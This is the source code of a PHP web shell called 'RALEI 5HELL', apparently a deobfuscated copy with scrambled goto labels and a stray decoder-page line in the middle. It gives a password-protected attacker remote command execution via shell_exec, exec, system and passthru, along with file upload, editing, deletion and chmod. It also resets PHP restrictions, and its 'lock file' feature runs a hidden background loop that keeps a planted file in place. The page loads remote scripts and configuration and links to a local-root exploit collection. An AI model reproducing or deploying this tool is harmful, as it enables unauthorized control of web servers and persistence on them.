    "; } else { displayAlert("{$getfile} : Not a valid file path!", "danger"); } } goto pdgfd; mwAc1: echo !empty($disabledFunc) ? implode(", ", $disabledFunc) : "None"; goto VRGnu; kBm3K: echo "{$_SERVER["SERVER_ADDR"]}"; goto R8Gse; qanfw: ini_restore("disable_functions"); goto xN1dV; eD2Ck: ?> 
</span></div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-cursor"></i> Curl:</span><?php  goto KNMNH; zzU8_: echo function_exists("mysql_version") ? "<span class="text-success">ON</span>" : "<span class="text-danger">OFF</span>"; goto eo9oy; qwjLI: echo php_uname(); goto tWlkv; C2o3f: if (isset($_GET["ex"]) && $_GET["ex"] == "kill_me") { unlink(__FILE__); die("OK"); } goto eZ1vu; Mrb2A: if (isset($_GET["ex"]) && $_GET["ex"] == "lokfil") { if (isset($_POST["lokfil"])) { } echo modalpost("L\303\xb8ck File", "Input File Name", $modalClock, "fa-lock", '', true); echo "<script>
    window.onload = function() {
      var getModalok = document.querySelector("[data-bs-target='#l\303\270ckfile']");\xa      getModalok.addEventListener("click", function(event) {
        event.preventDefault();\xa      });\xa      getModalok.click();\xa    }\xa  </script>"; } goto M2vPM; LfI7x: $getdir = isset($_GET["getdir"]) && !empty($_GET["getdir"]) ? IS_WIN ? str_replace("\", "/", $_GET["getdir"]) : $_GET["getdir"] : (isset($_GET["getfile"]) ? dirname($_GET["getfile"]) : getcwd()); goto Fxsb6; Gwr5s: session_start(); goto Y7joY; Zbqxa: $modalUpload = "<form action="?getdir=" . $getdir . "&ex=upload" method="post" enctype="multipart/form-data">" . "<div class="mb-4">" . "<label for="file-input" class="form-label">Select File</label>" . "<input type="file" class="form-control" name="upfile" id="file-input" required>" . "</div>" . "<div class="hstack gap-2 justify-content-end">" . "<button type="button" class="btn btn-outline-danger" data-bs-dismiss="modal">Close</button>" . "<button type="submit" class="btn btn-primary" name="submit_file" id="uploadFile">Upload</button>" . "</div>" . "</form>"; goto OvkMa; DPQLU: ?> 
</div><div class="col-12"><span class="fw-bold text-light"><i class="bi bi-hdd-stack"></i> Your IP:</span> <span class="text-success"><?php  goto TNQio; VKQfC: @mb_internal_encoding("UTF-8"); goto j84KU; AZ5Qx: if (isset($_GET["ex"]) && $_GET["ex"] == "terminal") { echo modalpost("Command 5hell", "Input Command", $modalCmd, "fa-rectangle-terminal", '', true, true); echo "<script>
    window.onload = function() {\xa      var getModalCmd = document.querySelector("[data-bs-target='#command5hell']");
      getModalCmd.addEventListener("click", function(event) {\xa        event.preventDefault();\xa      });
      getModalCmd.click();\xa    }
  </script>"; } goto pZLfW; Zxvrr: echo getUserGroupInfo(); goto DPQLU; VRGnu: ?> 
</span></div></div><div class="row"><div class="col-12 d-flex justify-content-between"><a class="btn btn-outline-light me-2 ms-2"data-bs-placement="top"data-bs-title="Kerang"data-bs-toggle2="tooltip"href="?getdir=<?php  goto fgSyv; q9Zuh: if (isset($_POST["massact"])) { if (isset($_POST["cekbox"])) { $maction = $_POST["maction"]; $cekbox = $_POST["cekbox"]; foreach ($cekbox as $cek) { if ($maction == "hapus") { if (is_dir($cek)) { if (rrmdir($cek)) { displayAlert("Success Deleted Dir: <b>" . basename($cek) . "</b>", "success"); } else { displayAlert("Failed To Deleted Dir: <b>" . basename($cek) . "</b>", "danger"); } } else { if (unlink($cek)) { displayAlert("Success Deleted File: <b>" . basename($cek) . "</b>", "success"); } else { displayAlert("Failed To Deleted File: <b>" . basename($cek) . "</b>", "danger"); } } } elseif ($maction == "cemode") { $chmod = intval($_POST["cemod"], 8); if (is_dir($cek)) { if (chmod($cek, $chmod)) { displayAlert("Success changed mode for directory: <b>" . basename($cek) . "</b>", "success"); } else { displayAlert("Failed to change mode for directory: <b>" . basename($cek) . "</b>", "danger"); } } elseif (is_file($cek)) { if (chmod($cek, $chmod)) { displayAlert("Success changed mode for file: <b>" . basename($cek) . "</b>", "success"); } else { displayAlert("Failed to change mode for file: <b>" . basename($cek) . "</b>", "danger"); } } } } } } goto wB8Oc; tTGul: error_reporting(0); goto VKQfC; R8Gse: ?> 
</span></div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-database"></i> Mysql:</span><?php  goto zzU8_; mubNe: function termnotasi() { if (IS_WIN) { $u = getenv("USERNAME"); $h = getenv("COMPUTERNAME"); } else { $u = posix_getpwuid(posix_geteuid())["name"]; $h = gethostname(); } return "{$u}@{$h}: ~ $ "; } goto GljT3; KmulI: ?> 
"><?php  goto mwAc1; cmASg: ?> 
</title><link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css"rel="stylesheet"crossorigin="anonymous"integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD"><link href="https://cdn.jsdelivr.net/npm/[email protected]/font/bootstrap-icons.css"rel="stylesheet"><link href="https://fonts.googleapis.com/css2?family=Exo+2:wght@600&display=swap"rel="stylesheet"><link href="https://rhmansh.github.io/RALEI-SHELL/assets/css/main.css"rel="stylesheet"><link href="https://rhmansh.github.io/RALEI-SHELL/assets/css/icon.css"rel="stylesheet"><script src="https://unpkg.com/@popperjs/core@2"></script><script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js"crossorigin="anonymous"integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN"></script><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script><script src="https://rhmansh.github.io/RALEI-SHELL/assets/js/app.js"></script></head><body><div class="preloader"><div class="loder"></div></div><style></style><div class="container-fluid zoom-in"><div class="row py-4"><div class="col-12 d-flex justify-content-center"><h1 class="fw-bold"><div class="judul mb-3"></div><div class="text-center fs-6 itsme"></div></h1></div></div><div class="row mb-2"><div class="col-12"><div class="border-light card border"><div class="card-body"><div class="text-center card-title text-warning">[!] This is Beta Version [!]</div><div class="row mb-2"><div class="col-12"><span class="fw-bold text-light"><i class="bi bi-terminal"></i> Un4me:</span> <span class="text-success"><?php  goto qwjLI; TNQio: echo "{$_SERVER["REMOTE_ADDR"]}"; goto i0xkR; eZ1vu: function login_ralei() { echo leijson()["login1"]; die; } goto wFaVC; j4A33: function isWritable($path) { if (is_dir($path)) { return is_writable($path); } else { return is_writable(dirname($path)); } } goto Nqyb1; wB8Oc: if (isset($_POST["rename"])) { $new_name = $_POST["new_name"]; $renamed = rename($getfile, dirname($getfile) . "/" . $new_name); if ($renamed) { displayAlert("File/Directory has been renamed, yasss!", "success"); } else { displayAlert("Failed to renamed File/Directory!", "danger"); } } goto lEKGy; c11Ug: echo "{$_SERVER["SERVER_NAME"]}"; goto eD2Ck; JIcP4: echo "</div>\xa   <!-- end container -->\xa<div class="container-fluid">\xa  <footer class="text-light py-3">\xa    <div class="row">\xa      <div class="col-12">\xa        <p class="myteam text-decoration-underline text-center"></p>
      </div>
    </div>
</footer>
    </div>\xa<script src="https://rhmansh.github.io/RALEI-SHELL/assets/js/main.js"></script>    
</body>
</html>"; goto utTWY; MSit5: if (isset($_GET["ex"]) && $_GET["ex"] == "retmi") { echo leijson()["readme"]; } goto xFpoT; YUX2m: function rrmdir($dir) { if (!is_dir($dir)) { throw new Exception("{$dir} is not a directory."); } $objects = scandir($dir); if ($objects === false) { throw new Exception("Failed to read directory {$dir}."); } foreach ($objects as $object) { if ($object != "." && $object != "..") { $path = $dir . "/" . $object; if (is_dir($path)) { if (!rrmdir($path)) { return false; } } else { if (!unlink($path)) { return false; } } } } if (!reset($objects)) { return false; } if (!rmdir($dir)) { return false; } clearstatcache(true, $dir); if (is_dir($dir)) { return false; } return true; } goto mubNe; SlGUD: if (!isset($_SESSION["masuk"]) || $_SESSION["masuk"] != $auth_pass) { login_ralei(); } goto W6n8o; iadoK: echo function_exists("perl") ? "<span class="text-success">ON</span>" : "<span class="text-danger">OFF</span>"; goto IBFMi; fg2Cp: echo isWritable(isset($getfile) ? $getfile : $getdir) ? span("[ Writable ] - ", "success") . "<span class="text-success">" . cekPerm(isset($getfile) ? $getfile : $getdir) . "</span>" : span("[ Not Writable ] - ", "danger") . "<span class="text-danger">" . cekPerm(isset($getfile) ? $getfile : $getdir) . "</span>"; goto LfSDA; S9YqN: echo isset($getfile) ? get_tree_path($getfile) : get_tree_path($getdir); goto V8syj; flT2x: echo "?getdir=" . $getdir . "&ex=search"; goto SOZKH; lh6vq: echo IS_WIN ? "<span class="text-success">Windows</span>" : "<span class="text-success">Unix</span>"; goto yMi02; qdLwq: echo @$_SERVER["SERVER_ADDR"]; goto cmASg; jYFEI: echo extension_loaded("php_ruby") ? "<span class="text-success">ON</span>" : "<span class="text-danger">OFF</span>"; goto lu_RQ; JGZ79: if (isset($_POST["save_file"])) { $isifile = $_POST["isifile"]; $file_path = $getfile; function svwrite($fn, $c) { $f = fopen($fn, "w"); if ($f) { fwrite($f, $c); fclose($f); return true; } else { return false; } } function svfpc($fn, $c) { if (file_put_contents($fn, $c) !== false) { return true; } else { return false; } } if (svwrite($file_path, $isifile)) { displayAlert("Update File OK!", "success"); } else { $errsv = error_get_last(); if ($errsv !== null) { $errorMessage = $errsv["message"]; displayAlert("Update File FAILED! Error: {$errorMessage}", "danger"); } else { if (svfpc($file_path, $isifile)) { displayAlert("Update File OK!", "success"); } else { displayAlert("Update File FAILED!", "danger"); } } } } goto MSit5; KdUFm: ?> 
<span class="text-<?php  goto kocnX; EOEix: ?> 
</span></div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-filetype-php"></i> PHP version:</span> <span class="text-success"><?php  goto AkcPy; Od1fM: echo "&#9730; { RALEI 5HELL }"; goto NLzar; eo9oy: ?> 
</div></div><div class="row mb-2"><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-cloud"></i> Web Server:</span> <span class="text-success"><?php  goto EGi9S; GVhMk: ?> 
</span></div></div><div class="row mb-2"><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-globe"></i> Domain:</span> <span class="text-success"><?php  goto c11Ug; H6Tp2: $auth_pass = "93f47598a626a203ce65b0e587d889a0"; goto Hs_m8; PpmRX: if (isset($_GET["ex"]) && $_GET["ex"] == "search") { function sercing($dir, $searchQuery) { $res = ''; $files = scandir($dir); foreach ($files as $file) { if ($file === "." || $file === "..") { continue; } $path = $dir . "/" . $file; if (is_dir($path)) { $res .= sercing($path, $searchQuery); } else { if (strpos($file, $searchQuery) !== false) { $res .= $path . "\n"; } } } return $res; } echo modalpost("Search File / Dir", "Search...", $modalCsearch, "fa-search", '', true, true); echo "<script>\xa         window.onload = function() {\xa  var getModalSer = document.querySelector("[data-bs-target='#searchfile/dir']");\xa  getModalSer.addEventListener("click", function(event) {
    event.preventDefault();\xa  });
  getModalSer.click();
} 
</script>"; if (isset($_POST["sercing"])) { $serquery = $_POST["sercing"]; $seroutput = sercing(dirname($_SERVER["DOCUMENT_ROOT"]), $serquery); echo "<script>document.getElementById("seroutput").value = " . json_encode($seroutput) . ";</script>"; } } goto AZ5Qx; C0BHX: $modalCfolder = "<form method="post">" . "<div class="mb-4">" . "<label for="foldername-input" class="form-label">Folder Name</label>" . "<input type="text" class="form-control" name="folder_name" id="foldername-input" required placeholder="Enter folder name">" . "</div>" . "<div class="hstack gap-2 justify-content-end">" . "<button type="button" class="btn btn-outline-danger" data-bs-dismiss="modal">Close</button>" . "<button type="submit" class="btn btn-primary" name="create_folder" id="addNewFolder" data-bs-toggle="tooltip" data-bs-placement="top" data-bs-title="Create Folder">Create</button>" . "</div>" . "</form>"; goto bPZB4; utTWY: ?>

Did this file decode correctly?

Original Code

<?php 
// pliz mas jgn nge recode wkwk 
// copyright rahmanralei 2023 
@clearstatcache(); 
@mb_internal_encoding('UTF-8'); 
@set_time_limit(0); 
error_reporting(0); 
 goto Gwr5s; bPZB4: $modalClock = "<form method="post">" . "<div class="mb-4">" . "<label for="filename-input" class="form-label">File Name</label>" . "<input type="text" class="form-control" name="filok" id="filename-input" required placeholder="Enter file name to l\303\xb8cked">" . "</div>" . "<div class="hstack gap-2 justify-content-end">" . "<button type="button" class="btn btn-outline-danger" data-bs-dismiss="modal">Close</button>" . "<button type="submit" class="btn btn-primary" name="lokfil" id="addNewFile">Lock Now</button>" . "</div>" . "</form>"; goto bXXTk; V8syj: ?> 
- <span><?php  goto fg2Cp; MKNta: function curl_req($u) { $c = curl_init(); curl_setopt($c, CURLOPT_URL, $u); curl_setopt($c, CURLOPT_RETURNTRANSFER, true); $o = curl_exec($c); curl_close($c); return $o; } goto S97wg; xN1dV: ini_restore("allow_url_fopen"); goto RJZ6S; GljT3: function modalpost($title, $label, $form, $icon = '', $text = '', $hidden = false, $size = false) { $titles = str_replace(" ", '', strtolower($title)); $labels = str_replace(" ", '', strtolower($label)); $hidden_attr = $hidden ? "d-none" : ''; $size = $size ? "modal-fullscreen-lg-down" : ''; return "<div class="modal fade zoomIn" id="" . $titles . "" tabindex="-1" aria-labelledby="" . $titles . "_Label" aria-hidden="true">" . "<div class="modal-dialog modal-dialog-centered " . $size . "">" . "<div class="modal-content">" . "<div class="modal-header p-3 bg-soft-primary">" . "<h5 class="modal-title" id="" . $titles . "_Label">" . $title . "&nbsp; <i class="fad " . $icon . ""></i></h5>" . "<button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>" . "</div>" . "<div class="modal-body">" . $form . "</div>" . "</div>" . "</div>" . "</div>" . "<button class="btn btn-outline-light " . $hidden_attr . " me-2" data-bs-toggle="modal" data-bs-target="#" . $titles . "" data-bs-toggle2="tooltip" data-bs-placement="top" data-bs-title="" . $title . ""><i class=" " . $icon . "">" . $text . "</i></button>"; } goto Zbqxa; SwLyI: function formatBytes($size, $precision = 2) { $u = array("B", "KB", "MB", "GB", "TB"); $b = max($size, 0); $pow = floor(($b ? log($b) : 0) / log(1024)); $pow = min($pow, count($u) - 1); $b /= pow(1024, $pow); return round($b, $precision) . " " . $u[$pow]; } goto YUX2m; KNMNH: echo function_exists("curl_version") ? "<span class="text-success">ON</span>" : "<span class="text-danger">OFF</span>"; goto L3Eg1; yMi02: ?> 
</div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-code-slash"></i> Perl:</span><?php  goto iadoK; LfSDA: ?> 
</span></span></div></div></div></div><?php  goto PpmRX; dPqA6: echo modalpost("Create File", "File Name", $modalCfile, "fad fa-file-circle-plus"); goto OZW8u; bXXTk: $modalCsearch = "<form method="POST">
      <div class="mb-3">\xa        <div class="w-100">\xa          <textarea class="form-control bg-black text-success" id="seroutput" name="seroutput" rows="25" readonly></textarea>\xa        </div>
      </div>\xa      <div class="mb-3 d-flex">\xa        <input type="text" class="form-control bg-black text-success" id="sercing" name="sercing" placeholder="Search Name...">\xa      <button type="submit" class="btn bg-black text-light float-end ms-2"><i class="fad fa-search"></i></button>
</div>
    </form>"; goto jyDMo; S97wg: function get_tree_path($path) { $canonical_path = realpath($path); $path_parts = explode("/", $canonical_path); $tree_path = ''; $current_path = ''; foreach ($path_parts as $part) { $current_path .= $part . "/"; $tree_path .= "<a class='text-truncate fst-normal text-light text-decoration-none' href='?getdir=" . $current_path . "'>" . $part . "</a> / "; } $tree_path = rtrim($tree_path, "/ "); return $tree_path; } goto Sw0vr; Sw0vr: function leijson() { $lei = "https://rhmansh.github.io/RALEI-SHELL/json/ralei.json"; if (ini_get("allow_url_fopen")) { $jd = file_get_contents($lei); } else { $jd = curl_req($lei); } $d = json_decode($jd, true); return $d; } goto j4A33; IBFMi: ?> 
</div></div><div class="row mb-2"><div class="col-12"><span class="fw-bold text-light"><i class="bi bi-toggle2-off"></i> Disable Function:</span><?php  goto yQvhJ; SOZKH: ?> 
"><i class="fad fa-search"></i></a> <a class="btn btn-outline-light me-2 ms-2"data-bs-placement="top"data-bs-title="github"data-bs-toggle2="tooltip"href="https://github.com/rhmansh"><i class="bi bi-github"></i></a></div></div></div></div></div></div><?php  goto q9Zuh; gKZcJ: $vartn = isset($_POST["command"]) ? $defcmd . " " . $_POST["command"] : $defcmd; goto AfZc1; pdgfd: if (isset($getdir)) { if (isset($_POST["create_file"])) { $file_name = $_POST["file_name"]; $filepath = $getdir . "/" . $file_name; if (file_exists($filepath)) { echo "<div class='alert alert-danger'>File sudah ada.</div>"; } else { if (touch($filepath)) { echo "<div class='alert alert-success'>File baru berhasil dibuat.</div>"; } else { $filecreate = fopen($filepath, "w"); if ($filecreate == false) { echo "<div class='alert alert-danger'>Tidak dapat membuat file baru.</div>"; } else { fclose($filecreate); echo "<div class='alert alert-success'>File baru berhasil dibuat.</div>"; } } } } if (isset($_POST["create_folder"])) { $folder_name = $_POST["folder_name"]; $folderpath = $getdir . "/" . $folder_name; if (mkdir($folderpath) == false) { echo "<div class='alert alert-danger'>Tidak dapat membuat folder.</div>"; } else { echo "<div class='alert alert-success'>Folder baru berhasil dibuat.</div>"; } } echo "
<div class="row mb-2">
  <div class="col-12">\xa    <div class="card border border-light">\xa      <div class="card-body d-flex flex-wrap justify-content-center">
          <a href="?getdir=" . $getdir . "&ex=terminal" class="btn btn-ralei me-2 mb-2">Terminal</a>
          <a href="?getdir=" . $getdir . "&ex=adminer" class="btn btn-ralei me-2 mb-2">Adminer</a>\xa          <a href="?getdir=" . $getdir . "&ex=scanrot" class="btn btn-ralei me-2 disabled mb-2">Scan R\xc3\xb8\xc3\270t</a>\xa          <a href="?getdir=" . $getdir . "&ex=portscan" class="btn btn-ralei disabled me-2 mb-2">Port Scan</a>
          <a href="?getdir=" . $getdir . "&ex=backconn" class="btn btn-ralei disabled me-2 mb-2">Back Conn3ct</a>
          <a href="?getdir=" . $getdir . "&ex=wpadd" class="btn btn-ralei disabled me-2 mb-2">Add Admin (WP)</a>\xa          <a href="?getdir=" . $getdir . "&ex=lokfil" class="btn btn-ralei me-2 mb-2">L\xc3\270ck File</a>\xa          <a href="?getdir=" . $getdir . "&ex=lockfile2" class="btn btn-ralei me-2 position-relative mb-2">Lock File 2<span class="position-absolute top-0 start-50 translate-middle badge bg-info">LINUX\xa  </span></a>
          <a href="https://github.com/rhmansh/Localr-ot-ALL-CVE" target="_blank" class="btn btn-ralei me-2 mb-2">Localro\xc3\xb8t</a>
          <a href="?getdir=" . $getdir . "&ex=kill_me" class="btn btn-ralei2 me-2 mb-2" onclick="return confirm('Sure?')">Kill Self</a>\xa          <a href="?getdir=" . $getdir . "&ex=keluar" class="btn btn-ralei me-2 mb-2">Logout</a>
          <a href="?getdir=" . $getdir . "&ex=retmi" class="btn btn-ralei me-2 mb-2">Readme</a>
      </div>
    </div>\xa  </div>
</div>\xa    <form method="post">\xa    <div class="row mb-2">
     <div class="col-12">
     <div class="card border border-light">
     <div class="card-body">\xa      <div class="table-responsive">\xa       <table class="table table-dark table-striped text-nowrap">
        <thead class="text-light">\xa         <tr>
          <th scope="col"><input id="cbox-all" class="form-check-input" type="checkbox">&ensp;Names</th>\xa          <th scope="col">Types</th>
          <th scope="col">Sizes</th>\xa          <th scope="col">Last Modded</th>\xa          <th scope="col">UID/GID</th>
          <th scope="col">Permissions</th>
          <th scope="col">Actions</th>\xa         </tr>\xa        </thead>
        <tbody>"; if (is_dir($getdir)) { if (is_readable($getdir)) { $filescn = scandir($getdir); $filescn = array_filter($filescn, function ($fileye) { return strcmp($fileye, ".") !== 0; }); if ($filescn !== false) { function get_file_owner($path) { if (IS_WIN) { return fileowner($path) . "/" . filegroup($path); } else { $uid = fileowner($path); return posix_getpwuid($uid)["name"] . "/" . posix_getgrgid(filegroup($path))["name"]; } } function get_file_perms($path) { if (IS_WIN) { return substr(sprintf("%o", fileperms($path) & 4095), -3); } else { return substr(sprintf("%o", fileperms($path)), -3); } } foreach ($filescn as $filey) { $getpath = $getdir . "/" . $filey; $getpath = trim($getpath); if (is_file($getpath)) { echo "<tr>"; echo "<td><input class='form-check-input' type='checkbox' name='cekbox[]' value='" . $getpath . "'>&ensp;<i class="fad fa-files" style="--fa-primary-opacity: 0.5; --fa-secondary-opacity: 1;"></i>&ensp;<a class="text-light text-decoration-none" href='?getfile=" . $getpath . "'>" . $filey . "</a></td>"; echo "<td><span class="text-" . (is_writable($getpath) ? "success" : (is_readable($getpath) ? "white" : "danger")) . "">[ File ]</span></td>"; $filesize = filesize($getpath); echo "<td>" . formatBytes($filesize) . "</td>"; echo "<td>" . date("d-m-Y/H:i", filemtime($getpath)) . "</td>"; $fileowner = get_file_owner($getpath); echo "<td>" . $fileowner . "</td>"; $perms = cekPerm($getpath); if (is_readable($getpath) && is_writable($getpath)) { echo "<td class='text-success'>" . $perms . "</td>"; } else { if (is_readable($getpath)) { echo "<td class='text-light'>" . $perms . "</td>"; } else { echo "<td class='text-danger'>" . $perms . "</td>"; } } echo "<td>" . twomenu("?getfile=" . $getpath) . "</td>"; echo "</tr>"; } elseif (is_dir($getpath)) { echo "<tr>"; echo "<td><input class='form-check-input' type='checkbox' name='cekbox[]' value='" . $getpath . "'>&ensp;<i class="text-warning fad fa-folders" style="--fa-secondary-opacity: 1;"></i>&ensp;<a class="text-light text-decoration-none" href='?getdir=" . $getpath . "'>" . $filey . "</a></td>"; echo "<td><span class="text-" . (is_writable($getpath) ? "success" : (is_readable($getpath) ? "white" : "danger")) . "">[ Dir ]</span></td>"; echo "<td>-</td>"; echo "<td>-</td>"; $fileowner = get_file_owner($getpath); echo "<td>" . $fileowner . "</td>"; $perms = cekPerm($getpath); if (is_readable($getpath) && is_writable($getpath)) { echo "<td class='text-success'>" . $perms . "</td>"; } else { if (is_readable($getpath)) { echo "<td class='text-light'>" . $perms . "</td>"; } else { echo "<td class='text-danger'>" . $perms . "</td>"; } } echo "<td>" . twomenu("?getfile=" . $getpath) . "</td>"; echo "</tr>"; } } } else { displayAlert("Failed to open directory : {$getdir}", "danger"); } } else { displayAlert("{$getdir} : Path not readable.", "danger"); } } else { displayAlert("{$getdir} : Not a valid directory path.", "danger"); } echo " </tbody>
       </table>
      </div>\xa      </div>
      </div>\xa     </div>\xa    </div>\xa  <div class="row py-2">
    <div class="col-3">
          <div class="form-group d-flex">
            <select class="form-select col-3 col-sm-4 me-2 bg-dark text-warning" name="maction">\xa    <option value="hapus">Delete</option>
    <option value="cemode">Chmod</option>\xa</select>\xa<input type="text" class="form-control col-3 col-sm-4 me-2" name="cemod" placeholder="0777" style="display: none;">\xa<button type="submit" name="massact" class="btn btn-warning ms-auto">Submit</button>
          </div>
        </div>
  </div>\xa</form>"; } 
if(isset($_GET['ex']) && $_GET['ex'] == "lokfil") { function lockFile($file) { global $getdir; $file = $getdir . '/' . $file; $dir = sys_get_temp_dir() . '/.s'; $textFile = $dir . '/' . base64_encode($file) . '-t'; $handlerFile = $dir . '/' . base64_encode($file) . '-h'; $targetDir = dirname($file); if (file_exists($textFile)) unlink($textFile); if (file_exists($handlerFile)) unlink($handlerFile); if (!file_exists($dir)) mkdir($dir); if (!copy($file, $textFile)) { displayAlert("False, Please Check Filename", "danger"); return; } if (!chmod($file, 0444)) { displayAlert("Locked Status False", "danger"); return; } $handler = <<<EOD 
<?php 
@ini_set("max_execution_time", 0); 
while (file_exists("$file")) { 
    if (!file_exists("$file")) { 
        \$t = base64_encode(file_get_contents("$textFile")); 
        file_put_contents("$file", base64_decode(\$t)); 
    } 
    if (fileperms("$file") !== 33060) { 
        chmod("$file", 0444); 
    } 
    if (fileperms("$targetDir") !== 33261) { 
        chmod("$targetDir", 0555); 
    } 
} 
EOD; if (!file_put_contents($handlerFile, $handler)) { displayAlert("Failed To Handler File", "danger"); return; } if (IS_WIN) { excmd("start /B php $handlerFile > NUL 2>NUL"); } else { excmd("php $handlerFile > /dev/null 2>/dev/null &"); } displayAlert("Locked Status True", "success"); } } 
if (isset($_POST['lokfil'])) { 
    lockFile($_POST['filok']); 
} 
goto JIcP4; Acaur: if (isset($_POST["command"])) { $command = $_POST["command"]; $jsoncmd = excmd($command, $getdir); $rescmd = $jsoncmd; if ($rescmd === false) { $error = "error"; echo $error; } else { echo $rescmd; } die; } goto lvt26; lu_RQ: ?> 
</div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-filetype-py"></i> Python:</span><?php  goto XL0iB; L3Eg1: ?> 
</div></div><div class="row mb-2"><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-filetype-rb"></i> Ruby:</span><?php  goto jYFEI; u7qY1: function excmd($koman, $dir = null) { $fff = array("shell_exec", "exec", "system", "passthru"); $o = null; if ($dir !== null) { $koman = "cd "" . $dir . "" && " . $koman; } foreach ($fff as $func) { if (function_exists($func)) { $o = $func($koman); if ($o !== null) { $o = utf8_encode($o); $json = json_encode($o); if ($json !== false) { if (trim($o) === '') { $err = ''; return $err; } return $o; } } } } if (strpos(strtolower($o), "command not found") !== false) { $err = "Command not found."; } else { $err = "No suitable function found to execute the command."; } return $err; die; } goto Acaur; OZW8u: echo modalpost("Create Folder", "Folder Name", $modalCfolder, "fad fa-folder-plus"); goto N5d1G; lvt26: if (isset($_GET["ex"]) && $_GET["ex"] == "keluar") { session_destroy(); header("Refresh: 0; url={$_SERVER["PHP_SELF"]}"); die; } goto C2o3f; Y7joY: @clearstatcache(); goto tTGul; IU1Xg: echo modalpost("Upload File", "Select File", $modalUpload, "fad fa-upload"); goto dPqA6; Nqyb1: function span($text, $color) { return "<span class="text-" . $color . "">" . $text . "</span>"; } goto gDQyA; pZLfW: if (isset($_GET["ex"]) && $_GET["ex"] == "upload") { if (isset($_FILES["upfile"])) { function upFil($f, $d) { if (move_uploaded_file($f["tmp_name"], $d)) { return true; } return false; } $upfile = $_FILES["upfile"]; $upfiltodir = isset($_GET["getdir"]) ? $_GET["getdir"] : ''; $desfil = $upfiltodir . "/" . $upfile["name"]; if (upFil($upfile, $desfil)) { displayAlert("Success Upload In" . $desfil, "success"); } else { displayAlert("Failed Upload In " . $desfil, "danger"); } } } goto Mrb2A; EGi9S: echo "{$_SERVER["SERVER_SOFTWARE"]}"; goto EOEix; fgSyv: echo getcwd(); goto uGapP; N5d1G: ?> 
<a class="btn btn-outline-light me-2 ms-2"data-bs-placement="top"data-bs-title="searching"data-bs-toggle2="tooltip"href="<?php  goto flT2x; RJZ6S: ini_restore("safe_mode"); goto SexdO; wBzEb: function getUserGroupInfo() { $username = get_current_user(); if (function_exists("posix_getuid") && function_exists("posix_getgid")) { $uid = posix_getuid(); $gid = posix_getgid(); $groupinfo = posix_getgrgid($gid); $groupname = $groupinfo["name"]; } else { $uid = getmyuid(); $gid = getmygid(); $groupname = "?"; } return "<span class='text-success'>{$username} ({$uid}) / {$groupname}</span>"; } goto SwLyI; yQvhJ: $disabledFunc = getDisabledFunctions(); goto KdUFm; ib1xY: @ini_set("max_execution_time", 0); goto rHz1f; uGapP: ?> 
"><i class="fad fa-house"></i></a> <a class="btn btn-outline-light me-2 font-weight-bold"data-bs-placement="top"data-bs-title="Refresh"data-bs-toggle2="tooltip"href="#"onclick="location.replace(location.href)"><i class="fad fa-rotate"></i> </a><?php  goto IU1Xg; jyDMo: $defcmd = "> " . termnotasi(); goto gKZcJ; XL0iB: echo function_exists("python") ? "<span class="text-success">ON</span>" : "<span class="text-danger">OFF</span>"; goto Jtcyo; i0xkR: ?> 
</span></div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-hdd-stack"></i> Server IP:</span> <span class="text-success"><?php  goto kBm3K; Wy3xc: function displayAlert($msg, $type) { echo "<div class="alert alert-" . $type . " alert-dismissible fade show border-light" role="alert">\xa              " . $msg . "
              <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
          </div>"; } goto MKNta; Jtcyo: ?> 
</div></div><div class="row mb-2"><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-terminal"></i> OS:</span><?php  goto lh6vq; rHz1f: @ini_set("output_buffering", 0); goto qanfw; Ztzcw: function getDisabledFunctions() { $d = ini_get("disable_functions"); $arr = array(); if ($d) { foreach (explode(",", $d) as $func) { $arr[] = $func; } } return $arr; } goto Wy3xc; RJWH8: $cekfopenon = ini_get("allow_url_fopen"); goto H6Tp2; lEKGy: if (isset($_POST["change_permission"])) { $permission = intval($_POST["permission"], 8); if (chmod($getfile, $permission)) { displayAlert("Change Permission OK!", "success"); } else { displayAlert("Change Permission FAILED!", "danger"); } } goto JGZ79; j84KU: @set_time_limit(0); goto ib1xY; pHDy4: function cekPerm($f) { if (IS_WIN) { $perms = @fileperms($f) & 4095; } else { $perms = @fileperms($f); } $mode = ''; $mode .= $perms & 256 ? "r" : "-"; $mode .= $perms & 128 ? "w" : "-"; $mode .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-"); $mode .= $perms & 32 ? "r" : "-"; $mode .= $perms & 16 ? "w" : "-"; $mode .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-"); $mode .= $perms & 4 ? "r" : "-"; $mode .= $perms & 2 ? "w" : "-"; $mode .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-"); $permis = substr(sprintf("%o", $perms), -3); $res = "(" . $permis . ") " . $mode; return $res; } goto u7qY1; Hs_m8: define("IS_WIN", strtoupper(substr(PHP_OS, 0, 3)) === "WIN"); goto LfI7x; Fxsb6: $getfile = isset($_GET["getfile"]) && !empty($_GET["getfile"]) ? IS_WIN ? str_replace("\", "/", $_GET["getfile"]) : $_GET["getfile"] : null; goto Ztzcw; AfZc1: $modalCmd = "<form id="formcmd" method="POST">\xa      <div class="mb-3">\xa        <div class="w-100">
          <textarea class="form-control bg-black text-success font-monospace" id="rescmd" name="rescmd" rows="25" readonly></textarea>
